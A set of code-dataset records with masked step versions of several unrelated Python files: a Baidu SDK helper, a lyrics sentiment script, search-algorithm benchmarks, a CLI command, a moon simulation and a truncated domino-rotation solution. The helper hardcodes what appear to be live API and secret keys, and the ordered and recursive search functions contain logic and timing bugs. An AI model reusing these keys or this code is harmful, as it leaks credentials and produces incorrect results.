"step-3": "<mask token>\nAPP_ID = '10676432'\nAPI_KEY = 'Hy1D1urUTdXzTOzqr9LeN3gc'\nSECRET_KEY = 'foS4GMg2w3QZtO9XNoSQF17Kkk007xWk'\n\n\ndef print_json(obj):\n \"\"\"json格式打印信息\n\n Args:\n obj 待打印的对象信息\n \"\"\"\n print(json.dumps(obj, ensure_ascii=False))\n\n\ndef print_error(err_code, err_msg):\n \"\"\"格式化打印错误信息\n\n Args:\n err_code: 错误码\n err_msg: 错误信息\n \"\"\"\n print(u'[{0}]: {1}'.format(err_code, err_msg))\n\n\ndef get_image_base64_content(image_file):\n \"\"\"获取图片base64编码信息\n\n Args:\n image_file: 图片\n\n Returns:\n base64编码的图片信息\n \"\"\"\n with open(image_file, 'rb') as fp:\n return str(base64.b64encode(fp.read()), 'utf-8')\n",
"step-4": "<mask token>\nimport json\nimport base64\nAPP_ID = '10676432'\nAPI_KEY = 'Hy1D1urUTdXzTOzqr9LeN3gc'\nSECRET_KEY = 'foS4GMg2w3QZtO9XNoSQF17Kkk007xWk'\n\n\ndef print_json(obj):\n \"\"\"json格式打印信息\n\n Args:\n obj 待打印的对象信息\n \"\"\"\n print(json.dumps(obj, ensure_ascii=False))\n\n\ndef print_error(err_code, err_msg):\n \"\"\"格式化打印错误信息\n\n Args:\n err_code: 错误码\n err_msg: 错误信息\n \"\"\"\n print(u'[{0}]: {1}'.format(err_code, err_msg))\n\n\ndef get_image_base64_content(image_file):\n \"\"\"获取图片base64编码信息\n\n Args:\n image_file: 图片\n\n Returns:\n base64编码的图片信息\n \"\"\"\n with open(image_file, 'rb') as fp:\n return str(base64.b64encode(fp.read()), 'utf-8')\n",
"step-5": "#coding=utf-8\n#\n\"\"\"\nmy custom common module\n\"\"\"\nimport json\nimport base64\n\n# sdk账号信息\nAPP_ID = '10676432'\nAPI_KEY = 'Hy1D1urUTdXzTOzqr9LeN3gc'\nSECRET_KEY = 'foS4GMg2w3QZtO9XNoSQF17Kkk007xWk'\n\n\ndef print_json(obj):\n \"\"\"json格式打印信息\n\n Args:\n obj 待打印的对象信息\n \"\"\"\n print(json.dumps(obj, ensure_ascii=False))\n\n\ndef print_error(err_code, err_msg):\n \"\"\"格式化打印错误信息\n\n Args:\n err_code: 错误码\n err_msg: 错误信息\n \"\"\"\n print(u\"[{0}]: {1}\".format(err_code, err_msg))\n\n\ndef get_image_base64_content(image_file):\n \"\"\"获取图片base64编码信息\n\n Args:\n image_file: 图片\n\n Returns:\n base64编码的图片信息\n \"\"\"\n with open(image_file, 'rb') as fp:\n return str(base64.b64encode(fp.read()), 'utf-8')\n\n",
"step-ids": [
0,
3,
4,
5,
6
]
}
|
[
0,
3,
4,
5,
6
] |
from pull_links import pull_links
from scrape_lyrics import scrape_lyrics
from vader_sentiment import getSentimentScores
import sys
import os
import shutil
# Get user input for artist -> capitalize it (e.g. "kanye west" -> "Kanye West").
artist = sys.argv[1].title()

# Scrape song links for the artist into links.json (side effect on disk).
pull_links(artist)
# Dictionary w/ song name as key and lyrics as value
lyrics = scrape_lyrics('links.json')
# Clean up the intermediate files/directories produced by the scraping step.
os.remove('./links.json')
shutil.rmtree('./songs')
# Dictionary w/ song name as key and sentiment data as value
sentimentScores = getSentimentScores(lyrics)
# Print out sentimentScores
for song in sentimentScores:
    print(song + ': ')
    print(sentimentScores[song])
|
normal
|
{
"blob_id": "5055743c9ed8c92bcfab5379162f28315409ff91",
"index": 2200,
"step-1": "<mask token>\n",
"step-2": "<mask token>\npull_links(artist)\n<mask token>\nos.remove('./links.json')\nshutil.rmtree('./songs')\n<mask token>\nfor song in sentimentScores:\n print(song + ': ')\n print(sentimentScores[song])\n",
"step-3": "<mask token>\nartist = sys.argv[1].title()\npull_links(artist)\nlyrics = scrape_lyrics('links.json')\nos.remove('./links.json')\nshutil.rmtree('./songs')\nsentimentScores = getSentimentScores(lyrics)\nfor song in sentimentScores:\n print(song + ': ')\n print(sentimentScores[song])\n",
"step-4": "from pull_links import pull_links\nfrom scrape_lyrics import scrape_lyrics\nfrom vader_sentiment import getSentimentScores\nimport sys\nimport os\nimport shutil\nartist = sys.argv[1].title()\npull_links(artist)\nlyrics = scrape_lyrics('links.json')\nos.remove('./links.json')\nshutil.rmtree('./songs')\nsentimentScores = getSentimentScores(lyrics)\nfor song in sentimentScores:\n print(song + ': ')\n print(sentimentScores[song])\n",
"step-5": "from pull_links import pull_links\nfrom scrape_lyrics import scrape_lyrics\nfrom vader_sentiment import getSentimentScores\nimport sys\nimport os\nimport shutil\n\n# Get user input for artist -> capitalize it\nartist = sys.argv[1].title()\n\npull_links(artist)\n# Dictionary w/ song name as key and lyrics as value\nlyrics = scrape_lyrics('links.json')\nos.remove('./links.json')\nshutil.rmtree('./songs')\n# Dictionary w/ song name as key and sentiment data as value\nsentimentScores = getSentimentScores(lyrics)\n# Print out sentimentScores\nfor song in sentimentScores:\n print(song + ': ')\n print(sentimentScores[song])\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import time
import random
import sys
def sequential_search(my_list, search_elt):
    """Linearly scan my_list for search_elt.

    Returns a (elapsed_seconds, found) tuple; elapsed_seconds is the
    wall-clock time spent scanning.
    """
    start = time.time()
    # any() short-circuits on the first match, just like a loop with break.
    found = any(search_elt == candidate for candidate in my_list)
    return (time.time() - start), found
def ordered_sequential_search(my_list, search_elt):
    """Sequentially search an ascending-sorted list for search_elt.

    Returns a (elapsed_seconds, found) tuple. Stops early as soon as the
    current element exceeds the target, since the target cannot appear
    later in an ascending list.
    """
    found = False
    start_time = time.time()
    for elt in my_list:
        if search_elt == elt:
            found = True
            break
        elif elt > search_elt:
            # BUG FIX: the original tested `search_elt > elt`, which bails
            # out on the first element *smaller* than the target and misses
            # matches further along the sorted list.
            break
    return (time.time() - start_time), found
def binary_search_iterative(my_list, search_elt):
    """Iterative binary search of an ascending-sorted list.

    Returns a (elapsed_seconds, found) tuple.
    """
    lo, hi = 0, len(my_list) - 1
    found = False
    start = time.time()
    while lo <= hi:
        mid = (lo + hi) // 2
        if my_list[mid] == search_elt:
            found = True
            break
        if my_list[mid] < search_elt:
            lo = mid + 1
        else:
            hi = mid - 1
    return (time.time() - start), found
def binary_search_rec(a_list, item):
    """Recursive binary search of an ascending-sorted list; returns a bool.

    Recurses on lo/hi indices instead of slicing: the original copied a
    sublist at every level (O(n) per call), this version does no copying.
    """
    def _search(lo, hi):
        # Empty range: item is not present.
        if lo > hi:
            return False
        mid = (lo + hi) // 2
        if a_list[mid] == item:
            return True
        if item < a_list[mid]:
            return _search(lo, mid - 1)
        return _search(mid + 1, hi)

    return _search(0, len(a_list) - 1)
def binary_search_recursive(my_list, search_elt, start_time=time.time):
    """Time a recursive binary search of a sorted list.

    Returns a (elapsed_seconds, found) tuple. The start_time parameter is
    ignored (immediately rebound) and kept only for backward compatibility
    with existing callers.
    """
    start_time = time.time()
    # BUG FIX: run the search *before* reading the clock again. The original
    # evaluated the elapsed time first in the return tuple, so the reported
    # time never included the search itself.
    found = binary_search_rec(my_list, search_elt)
    return (time.time() - start_time), found
def generate_random_nb_my_list(nb, amount_my_list, maxNumber=sys.maxsize):
    """Build amount_my_list lists, each with nb random ints in [0, maxNumber].

    PORTABILITY FIX: the default was the Python-2-only `sys.maxint`, which
    raises AttributeError under Python 3; `sys.maxsize` exists on both and
    equals maxint on CPython 2.
    """
    return [[random.randint(0, maxNumber) for _ in range(nb)]
            for _ in range(amount_my_list)]
def functionTimerAggregator(timeAggregator, fn, amt_of_nb, rnd_list):
    """Run one timed search and accumulate its elapsed time.

    fn is a (display_name, callable, index) triple; the callable is invoked
    on rnd_list[index] with target -1 (worst case for the non-negative
    random lists produced by generate_random_nb_my_list) and must return a
    (elapsed_seconds, found) tuple. The elapsed time is added into
    timeAggregator[amt_of_nb][display_name].
    """
    fn_name, fn_function, fn_list_indx = fn
    elapsed, _ = fn_function(rnd_list[fn_list_indx], -1)
    bucket = timeAggregator.setdefault(amt_of_nb, {})
    bucket[fn_name] = bucket.get(fn_name, 0) + elapsed
def printTimerAggregator(timeAggregator, list_size):
    """Print the average runtime of each function for every list size.

    :param timeAggregator: {list_size: {function_name: total_seconds}}
    :param list_size: number of runs each total was accumulated over
    """
    # PORTABILITY FIX: dict.items() works on both Python 2 and 3; the
    # original used the Python-2-only iteritems() and crashed under Python 3.
    for amount_of_number, fn_type in timeAggregator.items():
        print('For %s size of list:' % amount_of_number)
        for fn_name, consumedTime in fn_type.items():
            print('\t%s took %10.7f seconds to run, on average'
                % (fn_name, consumedTime / list_size))
if __name__ == '__main__':
    # Benchmark harness: average each search strategy's runtime over
    # `list_size` random lists at several list lengths.
    timeAggregator = {}
    amount_of_numbers = [500, 1000, 10000]
    # (display name, callable, index into the (unsorted, sorted) tuple
    # passed below); only plain sequential search uses the unsorted list.
    function_list = [
        ('Sequential Search', sequential_search, 0),
        ('Ordered Sequential Search', ordered_sequential_search, 1),
        ('Binary Search Iterative', binary_search_iterative, 1),
        ('Binary Search Recursive', binary_search_recursive, 1),
    ]
    list_size = 100
    for amount_of_number in amount_of_numbers:
        my_randoms = generate_random_nb_my_list(amount_of_number, list_size)
        for unsorted_list in my_randoms:
            # Keep the unsorted original and a sorted copy side by side.
            sorted_list = unsorted_list[:]
            sorted_list.sort()
            for fn in function_list:
                functionTimerAggregator(
                    timeAggregator, fn, amount_of_number,
                    (unsorted_list, sorted_list))
    printTimerAggregator(timeAggregator, list_size)
|
normal
|
{
"blob_id": "f3a34d1c37165490c77ccd21f428718c8c90f866",
"index": 4057,
"step-1": "<mask token>\n\n\ndef sequential_search(my_list, search_elt):\n found = False\n start_time = time.time()\n for elt in my_list:\n if search_elt == elt:\n found = True\n break\n return time.time() - start_time, found\n\n\ndef ordered_sequential_search(my_list, search_elt):\n found = False\n start_time = time.time()\n for elt in my_list:\n if search_elt == elt:\n found = True\n break\n elif search_elt > elt:\n break\n return time.time() - start_time, found\n\n\n<mask token>\n\n\ndef binary_search_rec(a_list, item):\n if len(a_list) == 0:\n return False\n else:\n midpoint = len(a_list) // 2\n if a_list[midpoint] == item:\n return True\n elif item < a_list[midpoint]:\n return binary_search_rec(a_list[:midpoint], item)\n else:\n return binary_search_rec(a_list[midpoint + 1:], item)\n\n\ndef binary_search_recursive(my_list, search_elt, start_time=time.time):\n start_time = time.time()\n return time.time() - start_time, binary_search_rec(my_list, search_elt)\n\n\n<mask token>\n\n\ndef functionTimerAggregator(timeAggregator, fn, amt_of_nb, rnd_list):\n fn_name, fn_function, fn_list_indx = fn\n timing, _ = fn_function(rnd_list[fn_list_indx], -1)\n if amt_of_nb not in timeAggregator:\n timeAggregator[amt_of_nb] = {}\n if fn_name not in timeAggregator[amt_of_nb]:\n timeAggregator[amt_of_nb][fn_name] = 0\n timeAggregator[amt_of_nb][fn_name] += timing\n\n\ndef printTimerAggregator(timeAggregator, list_size):\n for amount_of_number, fn_type in timeAggregator.iteritems():\n print('For %s size of list:' % amount_of_number)\n for fn_name, consumedTime in fn_type.iteritems():\n print('\\t%s took %10.7f seconds to run, on average' % (fn_name,\n consumedTime / list_size))\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef sequential_search(my_list, search_elt):\n found = False\n start_time = time.time()\n for elt in my_list:\n if search_elt == elt:\n found = True\n break\n return time.time() - start_time, found\n\n\ndef ordered_sequential_search(my_list, search_elt):\n found = False\n start_time = time.time()\n for elt in my_list:\n if search_elt == elt:\n found = True\n break\n elif search_elt > elt:\n break\n return time.time() - start_time, found\n\n\ndef binary_search_iterative(my_list, search_elt):\n first = 0\n last = len(my_list) - 1\n found = False\n start_time = time.time()\n while first <= last and not found:\n midpoint = (first + last) // 2\n if my_list[midpoint] == search_elt:\n found = True\n elif search_elt < my_list[midpoint]:\n last = midpoint - 1\n else:\n first = midpoint + 1\n return time.time() - start_time, found\n\n\ndef binary_search_rec(a_list, item):\n if len(a_list) == 0:\n return False\n else:\n midpoint = len(a_list) // 2\n if a_list[midpoint] == item:\n return True\n elif item < a_list[midpoint]:\n return binary_search_rec(a_list[:midpoint], item)\n else:\n return binary_search_rec(a_list[midpoint + 1:], item)\n\n\ndef binary_search_recursive(my_list, search_elt, start_time=time.time):\n start_time = time.time()\n return time.time() - start_time, binary_search_rec(my_list, search_elt)\n\n\n<mask token>\n\n\ndef functionTimerAggregator(timeAggregator, fn, amt_of_nb, rnd_list):\n fn_name, fn_function, fn_list_indx = fn\n timing, _ = fn_function(rnd_list[fn_list_indx], -1)\n if amt_of_nb not in timeAggregator:\n timeAggregator[amt_of_nb] = {}\n if fn_name not in timeAggregator[amt_of_nb]:\n timeAggregator[amt_of_nb][fn_name] = 0\n timeAggregator[amt_of_nb][fn_name] += timing\n\n\ndef printTimerAggregator(timeAggregator, list_size):\n for amount_of_number, fn_type in timeAggregator.iteritems():\n print('For %s size of list:' % amount_of_number)\n for fn_name, consumedTime in fn_type.iteritems():\n print('\\t%s took %10.7f 
seconds to run, on average' % (fn_name,\n consumedTime / list_size))\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef sequential_search(my_list, search_elt):\n found = False\n start_time = time.time()\n for elt in my_list:\n if search_elt == elt:\n found = True\n break\n return time.time() - start_time, found\n\n\ndef ordered_sequential_search(my_list, search_elt):\n found = False\n start_time = time.time()\n for elt in my_list:\n if search_elt == elt:\n found = True\n break\n elif search_elt > elt:\n break\n return time.time() - start_time, found\n\n\ndef binary_search_iterative(my_list, search_elt):\n first = 0\n last = len(my_list) - 1\n found = False\n start_time = time.time()\n while first <= last and not found:\n midpoint = (first + last) // 2\n if my_list[midpoint] == search_elt:\n found = True\n elif search_elt < my_list[midpoint]:\n last = midpoint - 1\n else:\n first = midpoint + 1\n return time.time() - start_time, found\n\n\ndef binary_search_rec(a_list, item):\n if len(a_list) == 0:\n return False\n else:\n midpoint = len(a_list) // 2\n if a_list[midpoint] == item:\n return True\n elif item < a_list[midpoint]:\n return binary_search_rec(a_list[:midpoint], item)\n else:\n return binary_search_rec(a_list[midpoint + 1:], item)\n\n\ndef binary_search_recursive(my_list, search_elt, start_time=time.time):\n start_time = time.time()\n return time.time() - start_time, binary_search_rec(my_list, search_elt)\n\n\ndef generate_random_nb_my_list(nb, amount_my_list, maxNumber=sys.maxint):\n return [[random.randint(0, maxNumber) for _ in range(nb)] for _ in\n range(amount_my_list)]\n\n\ndef functionTimerAggregator(timeAggregator, fn, amt_of_nb, rnd_list):\n fn_name, fn_function, fn_list_indx = fn\n timing, _ = fn_function(rnd_list[fn_list_indx], -1)\n if amt_of_nb not in timeAggregator:\n timeAggregator[amt_of_nb] = {}\n if fn_name not in timeAggregator[amt_of_nb]:\n timeAggregator[amt_of_nb][fn_name] = 0\n timeAggregator[amt_of_nb][fn_name] += timing\n\n\ndef printTimerAggregator(timeAggregator, list_size):\n for amount_of_number, fn_type in 
timeAggregator.iteritems():\n print('For %s size of list:' % amount_of_number)\n for fn_name, consumedTime in fn_type.iteritems():\n print('\\t%s took %10.7f seconds to run, on average' % (fn_name,\n consumedTime / list_size))\n\n\nif __name__ == '__main__':\n timeAggregator = {}\n amount_of_numbers = [500, 1000, 10000]\n function_list = [('Sequential Search', sequential_search, 0), (\n 'Ordered Sequential Search', ordered_sequential_search, 1), (\n 'Binary Search Iterative', binary_search_iterative, 1), (\n 'Binary Search Recursive', binary_search_recursive, 1)]\n list_size = 100\n for amount_of_number in amount_of_numbers:\n my_randoms = generate_random_nb_my_list(amount_of_number, list_size)\n for unsorted_list in my_randoms:\n sorted_list = unsorted_list[:]\n sorted_list.sort()\n for fn in function_list:\n functionTimerAggregator(timeAggregator, fn,\n amount_of_number, (unsorted_list, sorted_list))\n printTimerAggregator(timeAggregator, list_size)\n",
"step-4": "import time\nimport random\nimport sys\n\n\ndef sequential_search(my_list, search_elt):\n found = False\n start_time = time.time()\n for elt in my_list:\n if search_elt == elt:\n found = True\n break\n return time.time() - start_time, found\n\n\ndef ordered_sequential_search(my_list, search_elt):\n found = False\n start_time = time.time()\n for elt in my_list:\n if search_elt == elt:\n found = True\n break\n elif search_elt > elt:\n break\n return time.time() - start_time, found\n\n\ndef binary_search_iterative(my_list, search_elt):\n first = 0\n last = len(my_list) - 1\n found = False\n start_time = time.time()\n while first <= last and not found:\n midpoint = (first + last) // 2\n if my_list[midpoint] == search_elt:\n found = True\n elif search_elt < my_list[midpoint]:\n last = midpoint - 1\n else:\n first = midpoint + 1\n return time.time() - start_time, found\n\n\ndef binary_search_rec(a_list, item):\n if len(a_list) == 0:\n return False\n else:\n midpoint = len(a_list) // 2\n if a_list[midpoint] == item:\n return True\n elif item < a_list[midpoint]:\n return binary_search_rec(a_list[:midpoint], item)\n else:\n return binary_search_rec(a_list[midpoint + 1:], item)\n\n\ndef binary_search_recursive(my_list, search_elt, start_time=time.time):\n start_time = time.time()\n return time.time() - start_time, binary_search_rec(my_list, search_elt)\n\n\ndef generate_random_nb_my_list(nb, amount_my_list, maxNumber=sys.maxint):\n return [[random.randint(0, maxNumber) for _ in range(nb)] for _ in\n range(amount_my_list)]\n\n\ndef functionTimerAggregator(timeAggregator, fn, amt_of_nb, rnd_list):\n fn_name, fn_function, fn_list_indx = fn\n timing, _ = fn_function(rnd_list[fn_list_indx], -1)\n if amt_of_nb not in timeAggregator:\n timeAggregator[amt_of_nb] = {}\n if fn_name not in timeAggregator[amt_of_nb]:\n timeAggregator[amt_of_nb][fn_name] = 0\n timeAggregator[amt_of_nb][fn_name] += timing\n\n\ndef printTimerAggregator(timeAggregator, list_size):\n for 
amount_of_number, fn_type in timeAggregator.iteritems():\n print('For %s size of list:' % amount_of_number)\n for fn_name, consumedTime in fn_type.iteritems():\n print('\\t%s took %10.7f seconds to run, on average' % (fn_name,\n consumedTime / list_size))\n\n\nif __name__ == '__main__':\n timeAggregator = {}\n amount_of_numbers = [500, 1000, 10000]\n function_list = [('Sequential Search', sequential_search, 0), (\n 'Ordered Sequential Search', ordered_sequential_search, 1), (\n 'Binary Search Iterative', binary_search_iterative, 1), (\n 'Binary Search Recursive', binary_search_recursive, 1)]\n list_size = 100\n for amount_of_number in amount_of_numbers:\n my_randoms = generate_random_nb_my_list(amount_of_number, list_size)\n for unsorted_list in my_randoms:\n sorted_list = unsorted_list[:]\n sorted_list.sort()\n for fn in function_list:\n functionTimerAggregator(timeAggregator, fn,\n amount_of_number, (unsorted_list, sorted_list))\n printTimerAggregator(timeAggregator, list_size)\n",
"step-5": "#!/usr/bin/env python\r\n# -*- coding: utf-8 -*-\r\nimport time\r\nimport random\r\nimport sys\r\n\r\ndef sequential_search(my_list, search_elt):\r\n\tfound = False\r\n\tstart_time = time.time()\r\n\tfor elt in my_list:\r\n\t\tif search_elt == elt:\r\n\t\t\tfound = True\r\n\t\t\tbreak\r\n\treturn (time.time() - start_time), found\r\n\r\ndef ordered_sequential_search(my_list, search_elt):\r\n\tfound = False\r\n\tstart_time = time.time()\r\n\tfor elt in my_list:\r\n\t\tif search_elt == elt:\r\n\t\t\tfound = True\r\n\t\t\tbreak\r\n\t\telif search_elt > elt:\r\n\t\t\tbreak\r\n\treturn (time.time() - start_time), found\r\n\r\ndef binary_search_iterative(my_list, search_elt):\r\n\tfirst = 0\r\n\tlast = len(my_list) - 1\r\n\tfound = False\r\n\r\n\tstart_time = time.time()\r\n\twhile first <= last and not found:\r\n\t\tmidpoint = (first + last) // 2\r\n\t\tif my_list[midpoint] == search_elt:\r\n\t\t\tfound = True\r\n\t\telif search_elt < my_list[midpoint]:\r\n\t\t\tlast = midpoint - 1\r\n\t\telse:\r\n\t\t\tfirst = midpoint + 1\r\n\r\n\treturn (time.time() - start_time), found\r\n\r\ndef binary_search_rec(a_list, item):\r\n\tif len(a_list) == 0:\r\n\t\treturn False\r\n\telse:\r\n\t\tmidpoint = len(a_list) // 2\r\n\t\tif a_list[midpoint] == item:\r\n\t\t\treturn True\r\n\t\telif item < a_list[midpoint]:\r\n\t\t\treturn binary_search_rec(a_list[:midpoint], item)\r\n\t\telse:\r\n\t\t\treturn binary_search_rec(a_list[midpoint + 1:], item)\r\n\r\ndef binary_search_recursive(my_list, search_elt, start_time = time.time):\r\n\tstart_time = time.time()\r\n\treturn (time.time() - start_time), binary_search_rec(my_list, search_elt)\r\n\r\ndef generate_random_nb_my_list(nb, amount_my_list, maxNumber = sys.maxint):\r\n\treturn [\r\n\t\t[random.randint(0, maxNumber) for _ in range (nb)]\r\n\t\t\tfor _ in range (amount_my_list)\r\n\t]\r\n\r\ndef functionTimerAggregator(timeAggregator, fn, amt_of_nb, rnd_list):\r\n\t(fn_name, fn_function, fn_list_indx) = fn\r\n\t(timing, _) = 
fn_function(rnd_list[fn_list_indx], -1)\r\n\r\n\tif amt_of_nb not in timeAggregator:\r\n\t\ttimeAggregator[amt_of_nb] = {}\r\n\tif fn_name not in timeAggregator[amt_of_nb]:\r\n\t\ttimeAggregator[amt_of_nb][fn_name] = 0\t\r\n\ttimeAggregator[amt_of_nb][fn_name] += timing\r\n\r\ndef printTimerAggregator(timeAggregator, list_size):\r\n\tfor amount_of_number, fn_type in timeAggregator.iteritems():\r\n\t\tprint('For %s size of list:' % amount_of_number)\r\n\t\tfor fn_name, consumedTime in fn_type.iteritems():\r\n\t\t\tprint('\\t%s took %10.7f seconds to run, on average'\r\n\t\t\t\t% (fn_name, consumedTime / list_size))\r\n\r\nif __name__ == '__main__':\r\n\ttimeAggregator = {}\r\n\tamount_of_numbers = [500, 1000, 10000]\r\n\tfunction_list = [\r\n\t\t('Sequential Search', sequential_search, 0),\r\n\t\t('Ordered Sequential Search', ordered_sequential_search, 1),\r\n\t\t('Binary Search Iterative', binary_search_iterative, 1),\r\n\t\t('Binary Search Recursive', binary_search_recursive, 1),\r\n\t]\r\n\tlist_size = 100\r\n\r\n\tfor amount_of_number in amount_of_numbers:\r\n\t\tmy_randoms = generate_random_nb_my_list(amount_of_number, list_size)\r\n\t\tfor unsorted_list in my_randoms:\r\n\t\t\tsorted_list = unsorted_list[:]\r\n\t\t\tsorted_list.sort()\r\n\r\n\t\t\tfor fn in function_list:\r\n\t\t\t\tfunctionTimerAggregator(\r\n\t\t\t\t\ttimeAggregator, fn, amount_of_number,\r\n\t\t\t\t\t(unsorted_list, sorted_list))\r\n\r\n\tprintTimerAggregator(timeAggregator, list_size)\r\n\t",
"step-ids": [
6,
7,
9,
10,
11
]
}
|
[
6,
7,
9,
10,
11
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
@click.command()
@click.argument('command', nargs=1, required=True)
@click.pass_obj
def run(meg: Megalus, command: str) ->None:
"""Run selected script.
:param meg: Megalus instance
:param command: command/script to execute
:return: None
"""
line_to_run = meg.config_data['defaults'].get('scripts', {}).get(command,
None)
if not line_to_run:
logger.warning('Command "{}" not found in configuration file.'.
format(command))
else:
meg.run_command(line_to_run)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
import click
from loguru import logger
from megalus.main import Megalus
@click.command()
@click.argument('command', nargs=1, required=True)
@click.pass_obj
def run(meg: Megalus, command: str) ->None:
"""Run selected script.
:param meg: Megalus instance
:param command: command/script to execute
:return: None
"""
line_to_run = meg.config_data['defaults'].get('scripts', {}).get(command,
None)
if not line_to_run:
logger.warning('Command "{}" not found in configuration file.'.
format(command))
else:
meg.run_command(line_to_run)
<|reserved_special_token_1|>
"""Command 'run' module."""
import click
from loguru import logger
from megalus.main import Megalus
@click.command()
@click.argument("command", nargs=1, required=True)
@click.pass_obj
def run(meg: Megalus, command: str) -> None:
    """Execute the script registered under *command*.

    :param meg: Megalus instance holding the parsed configuration
    :param command: name of the configured script to run
    :return: None
    """
    scripts = meg.config_data["defaults"].get("scripts", {})
    line_to_run = scripts.get(command, None)
    if line_to_run:
        meg.run_command(line_to_run)
    else:
        logger.warning('Command "{}" not found in configuration file.'.format(command))
|
flexible
|
{
"blob_id": "23a4ca8eec50e6ab72be3f1b1077c61f676b3cce",
"index": 5777,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\n@click.command()\n@click.argument('command', nargs=1, required=True)\n@click.pass_obj\ndef run(meg: Megalus, command: str) ->None:\n \"\"\"Run selected script.\n\n :param meg: Megalus instance\n :param command: command/script to execute\n :return: None\n \"\"\"\n line_to_run = meg.config_data['defaults'].get('scripts', {}).get(command,\n None)\n if not line_to_run:\n logger.warning('Command \"{}\" not found in configuration file.'.\n format(command))\n else:\n meg.run_command(line_to_run)\n",
"step-3": "<mask token>\nimport click\nfrom loguru import logger\nfrom megalus.main import Megalus\n\n\n@click.command()\n@click.argument('command', nargs=1, required=True)\n@click.pass_obj\ndef run(meg: Megalus, command: str) ->None:\n \"\"\"Run selected script.\n\n :param meg: Megalus instance\n :param command: command/script to execute\n :return: None\n \"\"\"\n line_to_run = meg.config_data['defaults'].get('scripts', {}).get(command,\n None)\n if not line_to_run:\n logger.warning('Command \"{}\" not found in configuration file.'.\n format(command))\n else:\n meg.run_command(line_to_run)\n",
"step-4": "\"\"\"Command 'run' module.\"\"\"\n\nimport click\nfrom loguru import logger\n\nfrom megalus.main import Megalus\n\n\n@click.command()\n@click.argument(\"command\", nargs=1, required=True)\n@click.pass_obj\ndef run(meg: Megalus, command: str) -> None:\n \"\"\"Run selected script.\n\n :param meg: Megalus instance\n :param command: command/script to execute\n :return: None\n \"\"\"\n line_to_run = meg.config_data[\"defaults\"].get(\"scripts\", {}).get(command, None)\n if not line_to_run:\n logger.warning('Command \"{}\" not found in configuration file.'.format(command))\n else:\n meg.run_command(line_to_run)\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
import os, copy
from a import Moon, updateOneMoon, updateAllMoons
# Resolve the input file relative to this script's own directory.
file_path = os.path.dirname(os.path.realpath(__file__))
input_path = file_path + "/b.in.txt"
inpt = open(input_path, 'r')
moons = []
# One Moon instance per input line.
for line in inpt:
    new_moon = Moon(line)
    moons.append(new_moon)
# Snapshot of the starting state (not referenced again below).
initial_moon_position = copy.deepcopy(moons)
# NOTE: Python 2 script -- `print` statement and builtin `reduce`.
print reduce(lambda x, y: x + y.thisIsntReallyTotalEnergy(), moons, 0)
# zeros[i] collects the simulation steps at which moon i reports zero
# "energy" (assumes exactly 4 moons in the input -- TODO confirm).
zeros = [
[],
[],
[],
[]
]
for x in range(2780):
    updateAllMoons(moons)
    for i in range(len(moons)):
        if moons[i].thisIsntReallyTotalEnergy() == 0:
            zeros[i].append(x)
    # print reduce(lambda x, y: x + y.thisIsntReallyTotalEnergy(), moons, 0)
# For each moon: print the zero-energy steps, their first differences (zb)
# and second differences (za), presumably to spot a repeating cycle.
for z in zeros:
    print z
    zb = []
    for b in range(1, len(z)):
        zb.append(z[b] - z[b-1])
    print zb
    za = []
    for a in range(1, len(zb)):
        za.append(zb[a] - zb[a-1])
    print za
|
normal
|
{
"blob_id": "1f114b4716a44f5370495297511c305ecbb680c3",
"index": 7556,
"step-1": "import os, copy\nfrom a import Moon, updateOneMoon, updateAllMoons\n\nfile_path = os.path.dirname(os.path.realpath(__file__))\n\ninput_path = file_path + \"/b.in.txt\"\n\ninpt = open(input_path, 'r')\n\nmoons = []\n\nfor line in inpt:\n new_moon = Moon(line)\n moons.append(new_moon)\n\ninitial_moon_position = copy.deepcopy(moons)\n\nprint reduce(lambda x, y: x + y.thisIsntReallyTotalEnergy(), moons, 0)\n\nzeros = [\n[],\n[],\n[],\n[]\n]\n\nfor x in range(2780):\n updateAllMoons(moons)\n for i in range(len(moons)):\n if moons[i].thisIsntReallyTotalEnergy() == 0:\n zeros[i].append(x)\n # print reduce(lambda x, y: x + y.thisIsntReallyTotalEnergy(), moons, 0)\n\nfor z in zeros:\n print z\n zb = []\n for b in range(1, len(z)):\n zb.append(z[b] - z[b-1])\n print zb\n za = []\n for a in range(1, len(zb)):\n za.append(zb[a] - zb[a-1])\n print za\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
from collections import Counter
class Solution:
    """Solve "Minimum Domino Rotations For Equal Row" (LeetCode 1007)."""

    def minDominoRotations(self, A: List[int], B: List[int]) -> int:
        """Return the minimum number of index-wise swaps between A and B
        needed to make every element of A (or every element of B) equal,
        or -1 if impossible; 0 when either list is empty.

        Candidate (value, row) pairs are tried in decreasing frequency
        order, so the first feasible candidate needs the fewest rotations.
        """
        if not A or not B:
            return 0
        if len(A) != len(B):
            return -1
        cnt_a, cnt_b = Counter(A), Counter(B)
        check_list = []
        for num, freq in cnt_a.items():
            check_list.append((freq, num, 'a'))
        for num, freq in cnt_b.items():
            check_list.append((freq, num, 'b'))
        check_list.sort(reverse=True)
        for freq, target, lst in check_list:
            if lst == 'a':
                to_list, from_list = A, B
            else:
                to_list, from_list = B, A
            # BUG FIX: the rotation count must restart for every candidate.
            # The original initialized cnt once before this loop, so swaps
            # counted for a failed candidate leaked into the next one and
            # could inflate the returned answer.
            cnt = 0
            invalid = False
            for i in range(len(A)):
                if to_list[i] == target:
                    continue
                if from_list[i] != target:
                    invalid = True
                    break
                cnt += 1
            if not invalid:
                return cnt
        return -1
|
normal
|
{
"blob_id": "069d85370d8358aa884b5195a1b52c0014efd161",
"index": 7637,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass Solution:\n <mask token>\n",
